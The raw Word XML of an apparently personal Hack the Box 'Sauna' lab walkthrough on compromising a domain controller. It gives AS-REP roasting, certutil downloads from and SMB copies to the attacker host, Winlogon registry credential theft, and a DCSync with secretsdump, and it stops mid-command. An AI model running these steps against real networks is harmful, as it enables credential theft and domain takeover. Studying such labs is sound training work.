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245D" w14:textId="6ED27E40" w:rsidR="00B17FD2" w:rsidRDefault="00311BE0">
      <w:r>
        <w:t xml:space="preserve">If you’re reading this, hello again! </w:t>
      </w:r>
      <w:r w:rsidR="00E7145D">
        <w:t xml:space="preserve">I finished up Hack the Box’s </w:t>
      </w:r>
      <w:r w:rsidR="00E7145D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sauna</w:t>
      </w:r>
      <w:r w:rsidR="00E7145D">
        <w:t xml:space="preserve">. This one went a lot quicker than I had anticipated. As I mentioned in my </w:t>
      </w:r>
      <w:r w:rsidR="00E7145D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Forest</w:t>
      </w:r>
      <w:r w:rsidR="00E7145D">
        <w:t xml:space="preserve"> walkthrough, these are meant to be a reference for future </w:t>
      </w:r>
      <w:r w:rsidR="005027DD">
        <w:t>me. What I didn’t know was that it was going to come into play so quickly. Let’s jump in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39445A19" w14:textId="77777777" w:rsidR="005027DD" w:rsidRDefault="005027DD"/>
    <w:p w14:paraId="785A431F" w14:textId="6DF1490E" w:rsidR="005027DD" w:rsidRDefault="005027DD">
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1F672" w14:textId="74DCB6F5" w:rsidR="005027DD" w:rsidRDefault="005027DD">
      <w:r>
        <w:t>Again, just like I do for everything, I start with my Nmap scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CE18A" w14:textId="4F884E37" w:rsidR="005163C6" w:rsidRDefault="005163C6" w:rsidP="005163C6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FA9F1" w14:textId="5F8AD29F" w:rsidR="005163C6" w:rsidRDefault="005163C6" w:rsidP="005163C6">
      <w:r>
        <w:t xml:space="preserve">Analyzing the scan, I notice quite a few similarities to the Forest box. It is a domain controller, has HTTP, LDAP and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D255C6">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B4D9B">
        <w:t xml:space="preserve"> open. </w:t>
      </w:r>
      <w:r w:rsidR="00630839">
        <w:t xml:space="preserve">At this point, I’m thinking that this could be a very similar setup to </w:t>
      </w:r>
      <w:r w:rsidR="00514D3C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Forest</w:t>
      </w:r>
      <w:r w:rsidR="00514D3C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78F0CB" w14:textId="77777777" w:rsidR="00514D3C" w:rsidRDefault="00514D3C" w:rsidP="005163C6"/>
    <w:p w14:paraId="29492123" w14:textId="0B661748" w:rsidR="00514D3C" w:rsidRDefault="00514D3C" w:rsidP="005163C6">
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="009A3514">
        <w:t xml:space="preserve"> + AS-REP Roast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A564C7" w14:textId="5CACF10F" w:rsidR="009F6198" w:rsidRDefault="00301D5A" w:rsidP="005163C6">
      <w:r>
        <w:t xml:space="preserve">Let’s start with HTTP. I opened my browser and navigated to the webpage. Right off the </w:t>
      </w:r>
      <w:r w:rsidR="005C2EAC">
        <w:t>bat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, I am presented </w:t>
      </w:r>
      <w:r w:rsidR="007D5FBD">
        <w:t>with Egotistical Bank’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> homepage. Knowing that this is an actual webpage, </w:t>
      </w:r>
      <w:r w:rsidR="005C2EAC">
        <w:t xml:space="preserve">I start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A7CCC">
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C2EAC">
        <w:t xml:space="preserve"> to enumerate available paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A7CCC">
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F6198">
        <w:t xml:space="preserve"> is a great tool to use when it comes to HTTP. It will take a wordlist and run through the URL and see if any pages exist</w:t>
      </w:r>
      <w:r w:rsidR="00723FC1">
        <w:t xml:space="preserve">. If it comes back with an HTTP 200, 301 or 403, it will report. HTTP 200 means that the page exists and is accessible. HTTP 301 is a redirect. This means that it will redirect you to a different page. 403 is an indication that you don’t have permission to view that page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748A5AF" w14:textId="6993773B" w:rsidR="00CB6B56" w:rsidRDefault="00CB6B56" w:rsidP="005163C6">
      <w:r>
        <w:t xml:space="preserve">The way I approach </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A7CCC">
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00D255C6">
        <w:t>to launch it with the &amp; at the end of the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B49DDB" w14:textId="51345B9C" w:rsidR="00CB6B56" w:rsidRDefault="007A7CCC" w:rsidP="00CB6B56">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB6B56">
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E679E" w14:textId="27E4E49B" w:rsidR="0014450C" w:rsidRDefault="00CB6B56" w:rsidP="00847BF7">
      <w:r>
        <w:t xml:space="preserve">The &amp; allows it to open from the </w:t>
      </w:r>
      <w:r w:rsidR="0014450C">
        <w:t>terminal but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> still allow other commands to run. I start with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A7CCC">
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> medium list and let it run.</w:t>
      </w:r>
      <w:r w:rsidR="00847BF7">
        <w:t xml:space="preserve"> I select the “go faster” option. Since I know this is </w:t>
      </w:r>
      <w:r w:rsidR="0014450C">
        <w:t xml:space="preserve">IIS, I select asp and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0014450C">
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0014450C">
        <w:t xml:space="preserve"> for file extensions. </w:t>
      </w:r>
      <w:r w:rsidR="002132C8">
        <w:t xml:space="preserve">If this were Linux, I would leave it as PHP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E02DAD" w14:textId="692D73F3" w:rsidR="002132C8" w:rsidRDefault="002132C8" w:rsidP="00847BF7">
      <w:r>
        <w:t xml:space="preserve">While </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A7CCC">
        <w:t>DirBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is running, I’m analyzing the web site itself. I look at blogs and see a “jenny joy” that has posted. I make note of that as a potential user. </w:t>
      </w:r>
      <w:r w:rsidR="00484CAF">
        <w:t xml:space="preserve">I then see the “About” page. Looking through that, I see a list of employees. I created a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00484CAF">
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00484CAF">
        <w:t xml:space="preserve"> file with different combinations </w:t>
      </w:r>
      <w:r w:rsidR="00A231DB">
        <w:t xml:space="preserve">their names. For example, first </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A231DB">
        <w:t>initial+last</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A231DB">
        <w:t xml:space="preserve"> name, first </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A231DB">
        <w:t>name+last</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A231DB">
        <w:t xml:space="preserve"> name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A231DB">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A231DB">
        <w:t xml:space="preserve">… </w:t>
      </w:r>
      <w:r w:rsidR="00122D20">
        <w:t>After creating a list of potential usernames, I attempted AS-REP roasting</w:t>
      </w:r>
      <w:r w:rsidR="003F4EDE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F31984">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00101465">
        <w:t xml:space="preserve">I followed the same path as I did in </w:t>
      </w:r>
      <w:r w:rsidR="00101465">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Forest</w:t>
      </w:r>
      <w:r w:rsidR="003F4EDE">
        <w:t xml:space="preserve">, so I won’t go into that detail. </w:t>
      </w:r>
      <w:r w:rsidR="009A3514">
        <w:t xml:space="preserve">After going through the AS-REP </w:t>
      </w:r>
      <w:r w:rsidR="009A3514">
        <w:lastRenderedPageBreak/>
        <w:t>roasting, I was successful</w:t>
      </w:r>
      <w:r w:rsidR="00727B30">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="001B2EEA">
        <w:t xml:space="preserve">obtained an AS-REP hash for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00727B30">
        <w:t>fsmith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00727B30">
        <w:t xml:space="preserve">. From there, I was </w:t>
      </w:r>
      <w:r w:rsidR="008D043F">
        <w:t xml:space="preserve">able </w:t>
      </w:r>
      <w:r w:rsidR="00BC2509">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="008D043F">
        <w:t xml:space="preserve">crack the password using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00747405">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D043F">
        <w:t xml:space="preserve">. Again, it was the same process as </w:t>
      </w:r>
      <w:r w:rsidR="008D043F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Forest</w:t>
      </w:r>
      <w:r w:rsidR="008D043F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C914663" w14:textId="2F16D817" w:rsidR="008D043F" w:rsidRDefault="001E48F3" w:rsidP="00847BF7">
      <w:r>
        <w:t>Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C17417">
        <w:t xml:space="preserve"> + SharpHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE3CB3" w14:textId="1D57F349" w:rsidR="00326DF6" w:rsidRDefault="001E48F3" w:rsidP="00847BF7">
      <w:r>
        <w:t xml:space="preserve">With valid </w:t>
      </w:r>
      <w:r w:rsidR="00D255C6">
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:t>, I established a foothold using Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC2509">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A227CD">
        <w:t>While navigating through the machine, an account stood out: svc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00326DF6">
        <w:t>loanmanager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00326DF6">
        <w:t>. I decided to focus on that later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94B498" w14:textId="5AAC6D9B" w:rsidR="00C73D58" w:rsidRDefault="00E36711" w:rsidP="00847BF7">
      <w:r>
        <w:t xml:space="preserve">I copied </w:t>
      </w:r>
      <w:r w:rsidR="002C1A18">
        <w:t xml:space="preserve">SharpHound over to the remote machine. </w:t>
      </w:r>
      <w:r w:rsidR="004D317B">
        <w:t>I first navigated to where SharpHound is located and then started up a simple HTTP server</w:t>
      </w:r>
      <w:r w:rsidR="008F5433">
        <w:t>. This allows me to copy the file from Kali to the remote machine.</w:t>
      </w:r>
      <w:r w:rsidR="00C61245">
        <w:t xml:space="preserve"> The IP of 10.10.15.101 is the IP of my machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643395C7" w14:textId="2903E0C2" w:rsidR="004D317B" w:rsidRDefault="004D317B" w:rsidP="00847BF7">
      <w:r>
        <w:t>On Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2379E6" w14:textId="22C761FD" w:rsidR="004D317B" w:rsidRDefault="004D317B" w:rsidP="004D317B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:r w:rsidRPr="004D317B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D317B">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D317B">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D317B">
        <w:t>sharphound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="622E0007" w14:textId="198E19AE" w:rsidR="004D317B" w:rsidRDefault="004D317B" w:rsidP="004D317B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C7CFE" w14:textId="23E6B845" w:rsidR="00CB6B56" w:rsidRDefault="00575CF0" w:rsidP="004D317B">
      <w:r>
        <w:t>On the DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC96BB" w14:textId="28B38991" w:rsidR="00575CF0" w:rsidRDefault="00E914E0" w:rsidP="00575CF0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00575CF0">
        <w:t>ertutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00575CF0">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00575CF0">
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00575CF0">
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00575CF0" w:rsidRPr="00743E96">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.15.101/SharpHound</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00575CF0">
        <w:t xml:space="preserve"> sharp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C06BC10" w14:textId="75D53203" w:rsidR="00575CF0" w:rsidRDefault="005548C4" w:rsidP="005548C4">
      <w:r>
        <w:t xml:space="preserve">This uses the </w:t>
      </w:r>
      <w:r w:rsidR="004522B2">
        <w:t>built-in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows command to download the file from my Kali machine. Once it has been downloaded, I simply run SharpHound</w:t>
      </w:r>
      <w:r w:rsidR="003F4EDE">
        <w:t>. SharpHound gathers Active Directory data</w:t>
      </w:r>
      <w:r w:rsidR="00E0344A">
        <w:t xml:space="preserve"> for analysis in BloodHound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB1577E" w14:textId="0AAE2C11" w:rsidR="005548C4" w:rsidRDefault="005548C4" w:rsidP="005548C4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>.\sharp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F99CF19" w14:textId="0CC25C86" w:rsidR="005548C4" w:rsidRDefault="0051252C" w:rsidP="005548C4">
      <w:r>
        <w:t>Once I have the data, I copy it back to my machine for analysis in BloodHound.</w:t>
      </w:r>
      <w:r w:rsidR="00C34E1B">
        <w:t xml:space="preserve"> The easiest way I’ve found to copy from the remote machine to my attacking machine is to host an SMB server on my machine and copy that way.</w:t>
      </w:r>
      <w:r w:rsidR="00E0344A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00655425">
        <w:t xml:space="preserve">I prefer using SMB </w:t>
      </w:r>
      <w:r w:rsidR="00A51150">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00747405">
        <w:t>ecause it is typically faster and more reliable tha</w:t>
      </w:r>
      <w:r w:rsidR="00690D87">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="00747405">
        <w:t>HTTP for transferring files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478F796" w14:textId="6899AC6B" w:rsidR="00C34E1B" w:rsidRDefault="00C34E1B" w:rsidP="005548C4">
      <w:r>
        <w:t>On Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F59C8" w14:textId="2DB7611A" w:rsidR="00C34E1B" w:rsidRDefault="00A227CD" w:rsidP="00C34E1B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A227CD">
        <w:t>impacket-smbserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A227CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A227CD">
        <w:t>share .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A227CD">
        <w:t xml:space="preserve"> -smb2support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219B9F7" w14:textId="71D1B163" w:rsidR="00A227CD" w:rsidRDefault="00A227CD" w:rsidP="00A227CD">
      <w:r>
        <w:t>On the DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C373E" w14:textId="27ABDF10" w:rsidR="0051252C" w:rsidRDefault="005A1AB7" w:rsidP="0051252C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005A1AB7">
        <w:t>copy 20260410162326_BloodHound.zip \\10.10.15.101\share\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528FB701" w14:textId="3A6B2916" w:rsidR="00A227CD" w:rsidRDefault="00A227CD" w:rsidP="00A227CD">
      <w:r>
        <w:t>Now that I have the data</w:t>
      </w:r>
      <w:r w:rsidR="00326DF6">
        <w:t xml:space="preserve">, I imported the data into BloodHound. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C097D51" w14:textId="0B65628E" w:rsidR="00F70709" w:rsidRDefault="00F70709" w:rsidP="00A227CD">
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C584712" w14:textId="5CBCCACF" w:rsidR="00F70709" w:rsidRDefault="00F70709" w:rsidP="00A227CD">
      <w:r>
        <w:t xml:space="preserve">Again, I’m slowly learning the nuances of BloodHound. I analyzed the data I had for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsmith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account. It showed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PSRemote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as a potential escalation path. After looking into it, </w:t>
      </w:r>
      <w:r w:rsidR="00FE0640">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00FE0640">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">wasn’t going to provide me any access that I didn’t already have by </w:t>
      </w:r>
      <w:r w:rsidR="001E48F3">
        <w:t>Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E48F3">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0640">
        <w:t>. As I mentioned earlier, I noticed that svc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE0640">
        <w:t>loanmanager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE0640">
        <w:t xml:space="preserve"> account. </w:t>
      </w:r>
      <w:r w:rsidR="008C1897">
        <w:t xml:space="preserve">I investigated that account and noticed it had </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C1897">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C1897">
        <w:t xml:space="preserve"> permissions already. This was the lightbulb moment. If I could compromise that account, I c</w:t>
      </w:r>
      <w:r w:rsidR="00367E1D">
        <w:t xml:space="preserve">ould </w:t>
      </w:r>
      <w:r w:rsidR="008C1897">
        <w:t xml:space="preserve">perform a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C1897">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00484AF8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00484AF8">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00484AF8">
        <w:t xml:space="preserve"> allows for data replication from the domain controller</w:t>
      </w:r>
      <w:r w:rsidR="00FC25AB">
        <w:t>, if the user has permissions to do so.</w:t>
      </w:r>
      <w:r w:rsidR="00484AF8">
        <w:t xml:space="preserve"> When it syncs, it relays users and password hashes. </w:t>
      </w:r>
      <w:r w:rsidR="008C1897">
        <w:t xml:space="preserve">I now have </w:t>
      </w:r>
      <w:r w:rsidR="00377AC9">
        <w:t xml:space="preserve">my </w:t>
      </w:r>
      <w:r w:rsidR="00484AF8">
        <w:t>next target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EC355" w14:textId="1AF8AE73" w:rsidR="00C70B0D" w:rsidRDefault="00436FA6" w:rsidP="00A227CD">
      <w:r>
        <w:t xml:space="preserve">Stored Passwords + </w:t>
      </w:r>
      <w:r w:rsidR="00C70B0D">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC775E" w14:textId="7DAE8452" w:rsidR="00C70B0D" w:rsidRDefault="00C70B0D" w:rsidP="00A227CD">
      <w:r>
        <w:t>I went through my Windows Privilege Escalation notes</w:t>
      </w:r>
      <w:r w:rsidR="00436FA6">
        <w:t xml:space="preserve"> to see what paths I might have available to me. I looked at user permissions and didn’t have anything that I could readily abuse. Continuing through my notes, I started to look for </w:t>
      </w:r>
      <w:r w:rsidR="000167B7">
        <w:t xml:space="preserve">passwords. Initially, </w:t>
      </w:r>
      <w:r w:rsidR="00191949">
        <w:t xml:space="preserve">I used a simple </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00191949">
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00191949">
        <w:t xml:space="preserve"> command to see if I could get anything to return. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A63485" w14:textId="128AC2B8" w:rsidR="00191949" w:rsidRDefault="00191949" w:rsidP="00191949">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password *.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048688C" w14:textId="63A77E05" w:rsidR="004B6BD9" w:rsidRDefault="00191949" w:rsidP="00191949">
      <w:r>
        <w:t xml:space="preserve">While that was running, I continued through my notes. </w:t>
      </w:r>
      <w:r w:rsidR="00617FA0">
        <w:t xml:space="preserve">I came across a registry query command that looks in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00617FA0">
        <w:t>WinLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00617FA0">
        <w:t xml:space="preserve"> section for credentials. </w:t>
      </w:r>
      <w:r w:rsidR="00D2655F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2655F">
        <w:t>WinLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2655F">
        <w:t xml:space="preserve"> registry key controls elements of the Windows logon process. If auto-logon is configured for a user, the credentials could be stored in plaintext. This can then be retrieved and used. </w:t>
      </w:r>
      <w:r w:rsidR="004B6BD9">
        <w:t>I used the following command on the DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F66C44" w14:textId="1500279E" w:rsidR="004B6BD9" w:rsidRDefault="004B6BD9" w:rsidP="004B6BD9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6A6C6" w14:textId="5B0D0A7D" w:rsidR="004B6BD9" w:rsidRDefault="004B6BD9" w:rsidP="004B6BD9">
      <w:r>
        <w:t>This brought back the password for the svc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loanmanager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account that I was focused on. </w:t>
      </w:r>
      <w:r w:rsidR="00C42420">
        <w:t xml:space="preserve">Now that I had those credentials, I could perform a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C42420">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C42420">
        <w:t xml:space="preserve"> attack and gather the hashes for all users within the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396642C2" w14:textId="24F08421" w:rsidR="00C42420" w:rsidRDefault="0092417D" w:rsidP="004B6BD9">
      <w:r>
        <w:t>Compromise + Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD0643" w14:textId="7FB8AE43" w:rsidR="00C42420" w:rsidRDefault="00F86745" w:rsidP="004B6BD9">
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="0092417D">
        <w:t xml:space="preserve">performed the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0092417D">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0092417D">
        <w:t xml:space="preserve"> and gathered the hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B246E" w14:textId="28BC764E" w:rsidR="0092417D" w:rsidRDefault="0092417D" w:rsidP="0092417D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0092417D">
        <w:t>impacket-secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0092417D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0092417D">
        <w:t>egotisticalbank</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0092417D">
        <w:t>/</w:t>
      </w:r>
